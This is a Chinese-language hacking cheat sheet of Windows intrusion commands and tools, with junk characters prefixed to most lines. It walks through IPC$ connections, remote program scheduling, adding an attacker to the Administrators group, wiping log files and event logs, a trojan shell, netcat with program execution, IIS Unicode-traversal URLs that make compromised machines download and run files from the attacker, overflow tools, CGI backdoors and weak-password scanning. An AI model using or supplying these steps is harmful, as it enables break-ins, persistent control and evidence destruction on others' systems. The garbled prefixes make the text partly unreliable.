网管和黑客都必须知道的命令
m!K`?P]:N 常用的几条NET命令:
@=sM')f& 2<FEn$n[ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
2z9s$tp "P9(k> (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
?Qxf~,F FMi:2.E (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
HSk_'g(\0 2Onp{,'} (查看远程主机时间) net time \\IP地址
:o 8XG f
OasX!= (定时启动某个程序) at \\IP地址 02:18 readme.exe
IE|? &O %b[>eIJU# (查看共享) net view \\IP地址
Xwo%DZKN ;=p3L<~c`K (查看netbios工作组列表) nbtstat -A IP地址
re~T,PPM ZfMs6`Wv
1 (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
KTq+JT u k5%W8dI (这两条把自己增加到管理员组): net user 用户名 密码 /add
B[,AR"#b uCr :+"C net localgroup Administrators 用户名 /add
?o6X_UxW! (Z0_e&=* (断开连接) net use \\IP地址\ipc$ /delete
^B)f!HtU l0 8vF$k|d 扫尾:
02_+{vk! mCyn:+ del C:\winnt\system32\logfiles\*.*
D3B] J= [D'h del C:\winnt\ssytem32\config\*.evt
yAiO._U j'k
< del C:\winnt\system32\dtclog\*.*
jsFfrS"* jF}-dfe del C:\winnt\system32\*.log
!-t,r%CG Vw|P;LLl` del C:\winnt\system32\*.txt
M#_|WL~ F8S>Ld del C:\winnt\*.txt
f{.4#C' q{ [!" , del C:\winnt\*.log
]|-sZ<?<i '451H3LC0 一、netsvc.exe
b'W.l1]<- Q5^ #:uZ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
^TtL-|I 3vs{*T" netsvc /list \\IP地址
0|Xz-Y f"*k>=ETI netsvc schedule \\IP地址 /query
=C2KHNc vc :% netsvc \\IP地址 schedule /start
/&c2O X|Z g#MLA5%=u 二、OpenTelnet.exe
o1vK2V 5Xf]j=_ 远程启动主机的Telnet服务,并绑定端口到7878,例如:
s+?2oPa -&COI-P8 OpenTelnet \\IP地址 用户名 密码 1 7878
XEnu0gr W=#AfPi$& 然后就可以telnet到主机的7878端口,进入DOS方式下:
}T0O~c{$i PY;tu#W!% telnet IP地址 7878
Khb Ku0Z 9Ta0Li 三、winshell.exe
dU#-;/}o CLTkyS)C 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
;=7K*npT 0k#7LubWZl p Path (查看winshell主程序的路径信息)
*a\6X(
~ W6Mq:?+ D b reBoot (重新启动机器)
'4nJ*Xa &JXb) W d shutDown (关闭机器)
ME$J42 ~o>Gm>5!HH s Shell (执行后你就会看到可爱的“C:\>”)
Zwm/ c]6` drMMf[ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
H %c6I lxm/*^
CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
R8cOb*D XC5/$3'M& 四、3389登陆器,GUI方式登录远程主机的
AN:yL
a! 8PzGUn;\ 五、elsave.exe
j.ucv 6Cz
O
ztn 事件日志清除工具
qVKd c*R- o K>(yC[ elsave -s \\IP地址 -l "application" -C
WR3,woo `sCn4-$8 elsave -s \\IP地址 -l "system" -C
|mP};&b ^$50[ elsave -s \\IP地址 -l "security" -C
5Yhcnwdm! LQHL4jRXU 执行后成功清除应用程序日志,系统日志,安全日志
{O9(<g 1$8@CT^m 六、hbulot.exe
Z2gWa~dBC {nbT$3=Zt 开启win2kserver和winxp的3389服务
;F#(:-: F~8'3!<9 hbulot [/r]
NNF"si\FE K8aqC{ 使用/r表示安装完成后自动重起目标使设置生效。
*68 TTBq( KW(a@X 七、nc.exe(netcat.exe)
+i!5<nn mUbm3JIjJ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
Z(7kwhP[` g"Y_!)X 想要连接到某处: nc [-options] hostname port[s] [ports] ...
fO$){(]^ dYwkP^KB 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
v,S5C 4WJY+) 参数:
p_h/hTi 8ix_<$% -e prog 程序重定向,一旦连接,就执行 [危险!!]
|)+
SG>- t|$jgM -g gateway source-routing hop point[s], up to 8
Y@`uBB[ U
fyhd -G num source-routing pointer: 4, 8, 12, ...
6,A|9UX=` d?8OY -h 帮助信息
*m}8L%<HT X>Vc4n<} -i secs 延时的间隔
=w!ik9 \c
-m\| -l 监听模式,用于入站连接
HiA E9 Vw1>d+<~-) -n 指定数字的IP地址,不能用hostname
}! EVf '< U&8?S -o file 记录16进制的传输
-B H/)$-$ O|V0WiY< -p port 本地端口号
!,$#i K9lekevB -r 任意指定本地及远程端口
Xj
1Oxm42 :YI5O/gsk? -s addr 本地源地址
=3.dgtH u<Kowt<ci -u UDP模式
UPI- j#yc F#gA2VCm -v 详细输出——用两个-v可得到更详细的内容
l!f_ +lv /@F'f@; -w secs timeout的时间
x%l(0K <NMJkl-r8r -z 将输入输出关掉——用于扫描时
v-tI`Qpb 八、TFTPD32.EXE
H-PVV&r .;]WcC<3 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
pL"{Uqi x
;|HT http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
J,
-.5 Hw o _;fV 然后可以直接令文件运行:
y#j7vO u]Ku96! http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
6sBt6?_T m ol,iM*l 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
B/wD~xC?x
HG;;M6 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
"pM>TMAE `(FjOd
K 一、一 Xscan命令行运行参数说明:
gsbr8zwG, C2}y#A I 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
v>]g="5}8 @G"nkB
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
)Ka-vX)D@ :)~l3:O xscan -file <主机列表文件名> <检测项目> [其他选项]
cXPpxRXBD .; F<X\_ 其中<检测项目> 含义如下:
lo$G*LWu: wa8jr5/k" -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
a9-Mc5^'n NPK; -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
A0<g8pv
$@L;j -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
Voo'ZeZa nQ\` ]_C -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
ZAr6RRv ^ \>6*U r -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
,)1C"' YB"gLv? [其他选项] 含义如下:
TcaW'&(K V
vrsf6l] -v: 显示详细扫描进度
,`bW(V },8|9z#pyB -p: 跳过Ping不通的主机
_LHbP=B ku5|cF*% -o: 跳过没有检测到开放端口的主机
~6f/jCluR% G'\[dwD,u -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10